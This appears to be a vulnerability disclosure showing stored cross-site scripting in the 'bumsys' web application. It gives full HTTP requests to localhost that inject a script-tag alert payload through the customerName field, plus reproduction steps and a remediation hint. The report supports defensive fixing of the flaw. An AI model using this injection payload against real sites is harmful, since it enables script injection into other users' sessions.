XSS vulnerability occurs in forms have select and search
POST /bumsys/xhr/?module=peoples&page=updateCustomer HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: 0ff078f9716f33e90c8ceb170867be09ff1b379a
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------308170463032889995491505595073
Content-Length: 2215
Origin: http://localhost
Connection: close
Referer: http://localhost/bumsys/peoples/customer-list/
Cookie: __e80d6ab52f32c63981a432872f0499f854e14685=t838t9fdikqhconbfnr7dkhap7; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerName"
test2"><script>alert('edit')</script>
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerNameLocalLen"
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerType"
Distributor
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerPhone"
123
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerEmail"
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerOpeningBalance"
11.00
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerShippingRate"
0.0000
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerDiscount"
0
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerSendNotification"
0
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerDivision"
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerDistrict"
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerUpazila"
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerPostalCode"
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerCountry"
Bangladesh
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerWebsite"
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerAddress"
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customer_id"
3
-----------------------------308170463032889995491505595073--
Ajax Loader:
GET /bumsys/xhr/?module=my-shop&page=editDiscount&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: 0ff078f9716f33e90c8ceb170867be09ff1b379a
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/bumsys/my-shop/discounts/
Cookie: __e80d6ab52f32c63981a432872f0499f854e14685=t838t9fdikqhconbfnr7dkhap7; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Step 1. Create a new customer without payload
View list customer
Step 2. Add a discount on My Shop
Step 3. Edit customer name
View list customer after editor
Step 4. Edit discounts and view alert
Please check all funtion ajax module, html_entity_decode